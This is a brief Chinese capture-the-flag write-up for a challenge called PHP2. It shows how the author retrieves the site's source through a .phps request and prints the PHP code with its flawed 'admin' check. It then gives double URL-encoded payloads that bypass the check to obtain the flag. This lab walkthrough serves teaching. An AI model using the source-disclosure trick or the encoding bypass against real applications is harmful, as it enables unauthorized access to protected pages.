PHP2
打开后,F12没有发现什么
御剑扫描
于是我们打开首页查看
http://111.198.29.45:31636/index.php
跟原来一模一样,于是把php换成phps
phps文件就是php的源代码文件,通常用于提供给用户(访问者)查看php代码,因为用户无法直接通过Web浏览器看到php文件的内容,所以需要用phps文件代替。其实,只要不用php等已经在服务器中注册过的MIME类型为文件即可,但为了国际通用,所以才用了phps文件类型。(参考https://zhidao.baidu.com/question/43693848.html)
得到源代码
<?php
if("admin"===$_GET[id]) {// 1 id不能等于admin
echo("<p>not allowed!</p>");
exit();
}
$_GET[id] = urldecode($_GET[id]);// 2 id等于解码后的id
if($_GET[id] == "admin")//解码后id等于admin
{
echo "<p>Access granted!</p>";
echo "<p>Key: xxxxxxx </p>";
}
?>
这里用url二次绕过
因为在 2 已经url解码一次了
admin的url二次编码为%2561%2564%256D%2569%256E
http://111.198.29.45:31636/index.php?id=%2561%2564%256D%2569%256E
也可只对其中一个或几个字母二次url编码如对a
http://111.198.29.45:31636/index.php?id=%2561dmin
得到flag
